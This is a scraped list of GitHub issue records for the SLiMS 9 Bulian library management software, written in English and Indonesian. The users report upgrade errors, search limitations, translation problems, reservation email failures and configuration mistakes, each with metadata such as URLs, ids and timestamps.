2021-06-11T11:42:57Z
https://github.com/slims/slims9_bulian/issues/84
913,475,906
84
[ "slims", "slims9_bulian" ]
Saya upgrade dari akasia ke bulian 9.0.0 di localhost dan ingin coba mengonlinekan slims bulian. Sudah install aplikasi bulian dari softaculous. Saat copy database, data loan tidak bisa di-copy dan muncul pesan eror berikut. Sejauh ini database lainnya bisa di-copy. Mohon bantuannya. ![slimstrouble](https://user-images.githubusercontent.com/84700086/119305320-c9186b80-bc92-11eb-927f-f5cd5b2f6b71.png)
Database loan dari localhost tidak bisa di-copy ke database online
https://api.github.com/repos/slims/slims9_bulian/issues/82/comments
3
2021-05-24T06:20:43Z
2021-06-02T05:25:53Z
https://github.com/slims/slims9_bulian/issues/82
899,308,012
82
[ "slims", "slims9_bulian" ]
Hello everyone, I installed slims 9 on my website, there are many languages but there is no my language. I was trying to replace the existing language (Arabic) to my language (vietnamese) by editting the file **messages.po**. The path is: **"\slims9_bulian-9.1.1\lib\lang\locale\ar_SA\LC_MESSAGES\messages.po".** After editting, I uploaded and replaced the file "messages.po" in my hosting with the same Path. After that, I accessed my website, selected Arabic in the menu, refreshed my website but the language in the content is still Arabic, the text that I replaced doesn't change. I tried to clear cache, delete cookie on Browser chrome but it is still like that. Please see the Screenshot below: ![Screenshot_5](https://user-images.githubusercontent.com/9654732/116045672-72703f80-a69c-11eb-843b-a97d6a8bf0da.png) ![image](https://user-images.githubusercontent.com/9654732/116046396-3a1d3100-a69d-11eb-8633-adeeb89cfaee.png) I hope you guys can give me an simple solution to translate new language. I can translate it by myself but I do not know where to do. Thank you guys very much! ------------------- Some information from my end: **Desktop (please complete the following information):** - OS: Windows 10 - Google Chrome: Version 90.0.4430.72 (Official Build) (64-bit)
Could not replace a language from the existing one
https://api.github.com/repos/slims/slims9_bulian/issues/81/comments
2
2021-04-26T07:37:29Z
2021-06-13T03:27:25Z
https://github.com/slims/slims9_bulian/issues/81
867,371,748
81
[ "slims", "slims9_bulian" ]
**Screenshots** I![image](https://user-images.githubusercontent.com/120725/115950226-3bffbc80-a504-11eb-83ed-75b74e8a6108.png) **Desktop (please complete the following information):** ![image](https://user-images.githubusercontent.com/120725/115950287-85e8a280-a504-11eb-8c5d-114fea0cd6af.png) **Describe the bug** Tidak bisa update atau create user baru ketika menggunakan MySQL 8
Tidak bisa membuat dan perbarui pengguna di MySQL8
https://api.github.com/repos/slims/slims9_bulian/issues/80/comments
1
2021-04-24T07:10:12Z
2021-04-24T10:06:15Z
https://github.com/slims/slims9_bulian/issues/80
866,679,722
80
[ "slims", "slims9_bulian" ]
**Describe the bug** After updating the files from 9.3.0 to 9.4.1, I get the following error and cannot enter the side anymore: Parse error: syntax error, unexpected 'array' (T_ARRAY), expecting function (T_FUNCTION) or const (T_CONST) in [...]/lib/Plugins.php on line 22 **To Reproduce** If I uncomment \SLiMS\Plugins::getInstance()->loadPlugins(); from sysconfig.inc.php, the error stops on the frontend but the backend is still blocked. **Expected behavior** Use of webservice without error.
unexpected 'array' in lib/Plugins.php
https://api.github.com/repos/slims/slims9_bulian/issues/78/comments
4
2021-04-18T15:05:00Z
2021-07-04T19:36:22Z
https://github.com/slims/slims9_bulian/issues/78
860,686,415
78
[ "slims", "slims9_bulian" ]
hello, need some solution for fixing my problem about book thumbnails after upgrading akasia 831 to bulian 931. i already restore /images/docs/ to bulian and image work fine for detail book page but not on homepage thumbnail with the same book displayed. after looking to inspection i found that the dir of minigalgano is not correct (pic below) ![image](https://user-images.githubusercontent.com/60458102/112786979-ad715a00-9081-11eb-8000-8069c9650c65.png) i think the correct dir is without "%2F" ---> ../../images/docs/filename maybe someone know how to fix it? this is happen only for book from my old akasia 8.3.1 note : using vps centos 7.9 with cpanel, php 7.2 thanks
Book Thumbnail not showing after upgrade akasia 831 to bulian 931
https://api.github.com/repos/slims/slims9_bulian/issues/75/comments
2
2021-03-29T04:33:08Z
2021-07-01T12:26:19Z
https://github.com/slims/slims9_bulian/issues/75
842,956,613
75
[ "slims", "slims9_bulian" ]
apakah ini bug atau konfigurasi server yang salah. terimakasih, sepesifikasi : php 7.4 mariadb 5.7 os sever : centos 7 cpanel : plesk
Option FollowSymLinks not allowed here, centos server & plesk panel
https://api.github.com/repos/slims/slims9_bulian/issues/74/comments
1
2021-02-23T07:11:22Z
2021-04-09T04:09:18Z
https://github.com/slims/slims9_bulian/issues/74
814,184,628
74
[ "slims", "slims9_bulian" ]
I noticed there are bunch of controllers and a routes file on `api/v1/` , I know it's sound silly but I will ask anyway. How do we access that routes as a restful API? I have read documentation and not found any clue. Thank you!
Restful API
https://api.github.com/repos/slims/slims9_bulian/issues/73/comments
1
2021-02-06T09:10:04Z
2021-02-08T15:38:09Z
https://github.com/slims/slims9_bulian/issues/73
802,652,036
73
[ "slims", "slims9_bulian" ]
I use a testing member to reserve books added to the basket. The reserving e-mail has been sent properly through smtp. But the admin page doesn't show any message though.
System doesn't respond to reservation request
https://api.github.com/repos/slims/slims9_bulian/issues/72/comments
2
2021-01-27T03:49:18Z
2023-04-12T05:04:34Z
https://github.com/slims/slims9_bulian/issues/72
794,743,620
72
[ "slims", "slims9_bulian" ]
I install slims through "web station" and use mariadb10 as a database. I create a member for testing to check whether the system could work. I add some books into the basket and click the reserve button. It pop-up a "Reservation e-mail sent" but nothing else happened. The administrator doesn't receive an e-mail or message. And the member's account doesn't borrow any book too. What will happen if the system works well? How does the system send email since it doesn't ask for the password of e-mail when adding the member?
Members click reserve button in book basket but nothing happend
https://api.github.com/repos/slims/slims9_bulian/issues/71/comments
1
2021-01-22T08:58:43Z
2021-01-26T03:11:11Z
https://github.com/slims/slims9_bulian/issues/71
791,824,385
71
[ "slims", "slims9_bulian" ]
In SLiMS 9.3.0, if I remove an image of one member then entire images of all members are removed. please help
Member Image
https://api.github.com/repos/slims/slims9_bulian/issues/70/comments
1
2021-01-08T15:49:02Z
2021-07-01T12:13:46Z
https://github.com/slims/slims9_bulian/issues/70
782,213,761
70
[ "slims", "slims9_bulian" ]
I am using SLiMS 9.3.0, from 4th january 2021 Latest Transactions bar chart on home and Loan History on circulation and reporting are not updated.
Latest Transactions on home and Loan History on circulation and reporting are not updated
https://api.github.com/repos/slims/slims9_bulian/issues/69/comments
0
2021-01-08T15:44:49Z
2021-01-08T15:44:49Z
https://github.com/slims/slims9_bulian/issues/69
782,210,126
69
[ "slims", "slims9_bulian" ]
**Is your feature request related to a problem? Please describe.** I tried the simple keyword word search from the default template. I tried author or a word in the notes abstract. I recieve no results. **Describe the solution you'd like** I added the feature of publisher and notes/abstract search, but I was wondering, if there is a reason, why the keyword search is limited. If there are no reasons, I would like to create the pull request to add keyword search for publisher and abstract/notes fields. **Describe alternatives you've considered** At least allow additional search options in the advanced search if database load would be to big if the keywords search would have more columns to search into. **Additional context** -
Extend search by keywords
https://api.github.com/repos/slims/slims9_bulian/issues/68/comments
1
2021-01-07T17:08:14Z
2021-08-19T13:54:39Z
https://github.com/slims/slims9_bulian/issues/68
781,468,161
68
[ "slims", "slims9_bulian" ]
**Describe the bug** Get Http 500 error response on clicking the admin top menu **To Reproduce** Steps to reproduce the behavior: 1. Go to 'admin page' 2. Click on 'any menu on the top menu of the admin page' 3. See an error **Expected behavior** When clicked bibliography, it should be bibliography showed up. **Desktop:** - OS: Windows - Browser chrome - Version 87.0.4280.88 (Official Build) (64-bit)
Error 500 on admin index.php?mod= request
https://api.github.com/repos/slims/slims9_bulian/issues/67/comments
1
2021-01-06T03:54:17Z
2021-01-06T15:01:09Z
https://github.com/slims/slims9_bulian/issues/67
779,972,235
67
[ "slims", "slims9_bulian" ]
Plugin ketika membuat modul baru plugin data maksimal yang tampil cuma 3
Plugin
https://api.github.com/repos/slims/slims9_bulian/issues/64/comments
2
2020-12-22T17:41:52Z
2020-12-22T18:43:39Z
https://github.com/slims/slims9_bulian/issues/64
773,128,260
64
[ "slims", "slims9_bulian" ]
**Describe the bug** The search function can't resolve keywords for less than 3 characters. For instance, it can return an appropriate result if I search for "Ajax" but return null if I search for "PHP". I wonder is there any code to limit the character number of keywords. If it exists I want to change it to 2. Besides, The search engine cannot resolve a title that includes lots of compound words. Which are very common in Japanese, Chinese, and German books. Is there any solution to handle these compound words? For example, it can return "Donaudampfschifffahrtsgesellschaftskapitänswitwe" when I search for "schaftskapitän" :-)
Cannot search keywords less than 3 characters
https://api.github.com/repos/slims/slims9_bulian/issues/63/comments
4
2020-12-02T02:05:58Z
2020-12-19T05:58:19Z
https://github.com/slims/slims9_bulian/issues/63
754,868,872
63
[ "slims", "slims9_bulian" ]
I'm working on it to solve the issue.
Failed to login and privilege problem in a load balanced environment
https://api.github.com/repos/slims/slims9_bulian/issues/62/comments
0
2020-11-21T08:31:54Z
2020-11-21T08:58:24Z
https://github.com/slims/slims9_bulian/issues/62
747,975,740
62
[ "slims", "slims9_bulian" ]
When I want to search a book through keywords, it turns no result if the keywords are not the full name of data in my database. For example, it can't return any result with keywords "python" if the book named "Core python programming". Is there any solution to achieve a fuzzy search?
How to achieve fuzzy search
https://api.github.com/repos/slims/slims9_bulian/issues/61/comments
1
2020-11-18T02:29:43Z
2020-12-02T01:44:25Z
https://github.com/slims/slims9_bulian/issues/61
745,273,442
61
[ "slims", "slims9_bulian" ]
I install slims through "web station" and use mariadb10 as a database. I can log in with the user I add when installing slims. But when I add a new member, I found that my password in the database becomes a mass like this: "$2y$10$if6n8bmjL2vurqtB7HuDa.aGF2ARRsQjYO1Z3OdS.xdg4li4VVIE2" I tried to login to new members through the password I add through the first librarian user or showing in the database. But all failed.
New member log in fail
https://api.github.com/repos/slims/slims9_bulian/issues/57/comments
3
2020-11-09T14:09:12Z
2020-11-12T06:35:26Z
https://github.com/slims/slims9_bulian/issues/57
739,059,701
57
[ "slims", "slims9_bulian" ]
struktur database CREATE TABLE `loan` ( `loan_id` int(11) NOT NULL, `item_code` varchar(20) COLLATE utf8_unicode_ci DEFAULT NULL, `member_id` varchar(20) COLLATE utf8_unicode_ci DEFAULT NULL, `loan_date` date NOT NULL, `due_date` date NOT NULL, `renewed` int(11) NOT NULL DEFAULT '0', `loan_rules_id` int(11) NOT NULL DEFAULT '0', `actual` date DEFAULT NULL, `is_lent` int(11) NOT NULL DEFAULT '0', `is_return` int(11) NOT NULL DEFAULT '0', `return_date` date DEFAULT NULL, `uid` int(11) DEFAULT NULL ) ENGINE=MyISAM DEFAULT CHARSET=utf8 COLLATE=utf8_unicode_ci; Mohon Solusinya terimakasih
Gagal menyimpan data peminjaman di database
https://api.github.com/repos/slims/slims9_bulian/issues/42/comments
0
2020-10-19T07:06:35Z
2020-10-19T13:31:10Z
https://github.com/slims/slims9_bulian/issues/42
724,336,653
42
[ "slims", "slims9_bulian" ]
**Describe the bug** As a member when a try to reserve a book/title from my basket, nothing happens. I do not get email sent confirmation. I have already configured my SMTP server details. **Additional context** A technical bug was found in the following file: lib\contents\member.inc.php. The root cause was function ```sendReserveMail()``` was defined after if was referred in ``` if (isset($_POST['sendReserve']) && $_POST['sendReserve'] == 1) { .... } ``` The fixed version of the same file is attached with this ticket. [member.inc.php.zip](https://github.com/slims/slims9_bulian/files/5322300/member.inc.php.zip)
Unable to reserve a book from basket
https://api.github.com/repos/slims/slims9_bulian/issues/40/comments
14
2020-10-03T21:03:06Z
2020-11-07T11:05:46Z
https://github.com/slims/slims9_bulian/issues/40
714,175,780
40
[ "slims", "slims9_bulian" ]
Ga Bisa Pinjam Kembali Buku, Pesan Errornya Notice: Trying to get property 'num_rows' of non-object in /storage/ssd3/300/14913300/public_html/lib/utility.inc.php on line 627
https://api.github.com/repos/slims/slims9_bulian/issues/37/comments
1
2020-09-20T15:38:54Z
2020-09-20T15:44:59Z
https://github.com/slims/slims9_bulian/issues/37
705,131,528
37
[ "slims", "slims9_bulian" ]
Tadi saya upgrade Dari SLiMs 8.0 hingga SLiMS 9.2.2 , saya upgrade dengan cara konvesional , impor sql upgrade , dari slims 8.0 hingga 8.4.2 Setelah login admin muncul :fearful: pesan eror `Notice : Trying to get property 'num_rows' of non-object in rows' of non-object in /home/ruwada/public_html/lib/utility.inc.php on line 627` ![Screenshot from 2020-09-20 09-09-40](https://user-images.githubusercontent.com/1111630/93692749-0edbcd80-fb21-11ea-84e8-640e071ae6de.png) Saya cek pada kode yang ditampilan pesan eror , saya simpulkan ada yang gak beres di tabel user , tidak ada kolom admin_template , seharus nya ini udah disertakan pada sql upgrade slims 9.x :green_heart: ![Screenshot from 2020-09-20 09-10-27](https://user-images.githubusercontent.com/1111630/93692759-24e98e00-fb21-11ea-9451-8ee50c617166.png) Saya bandingkan database tabel kolom dari SLiMS 9.2.2 install baru dengan hasil upgrade import SQL , ada yang tidak sama :smiley: ini yang di SLiMS 9.2.2 install baru ![Screenshot from 2020-09-20 09-12-35](https://user-images.githubusercontent.com/1111630/93692779-83af0780-fb21-11ea-98e1-3c9ae3f616d9.png) ini yang di SLiMS 9.2.2 , import upgrade , belum ada import sql dari SLiMS 9 ![Screenshot from 2020-09-20 09-12-53](https://user-images.githubusercontent.com/1111630/93692795-b48f3c80-fb21-11ea-8fa0-1e9991f387f6.png) tadi saya buat sendiri kolom yang belum ada , semoga kedepan nya di SLiMS 9 tag baru ada sql upgrade nya Terima kasih :rose:
SLiMS 9.x belum ada sql upgrade nya
https://api.github.com/repos/slims/slims9_bulian/issues/36/comments
1
2020-09-20T02:16:39Z
2020-09-20T09:28:33Z
https://github.com/slims/slims9_bulian/issues/36
705,030,395
36
[ "slims", "slims9_bulian" ]
Hello, I downloaded Slims 9.2.0 from here : https://github.com/slims/slims9_bulian/releases/download/v9.2.0/slims9_bulian-9.2.0.zip However, I found that in sysconfig.inc.php that the version number is not updated i.e : `define('SENAYAN_VERSION_TAG', 'v9.1.1');` instead of `define('SENAYAN_VERSION_TAG', 'v9.2.0');` Also, the environment is set to development instead of production i.e : `define('ENVIRONMENT', 'development');` instead of `define('ENVIRONMENT', 'production');` Could you please fix this ?.
Version number not updated in sysconfig.inc.php and also environment is set to development in Slims 9.2.0 release package
https://api.github.com/repos/slims/slims9_bulian/issues/33/comments
2
2020-09-14T09:54:28Z
2020-09-14T10:27:23Z
https://github.com/slims/slims9_bulian/issues/33
700,951,015
33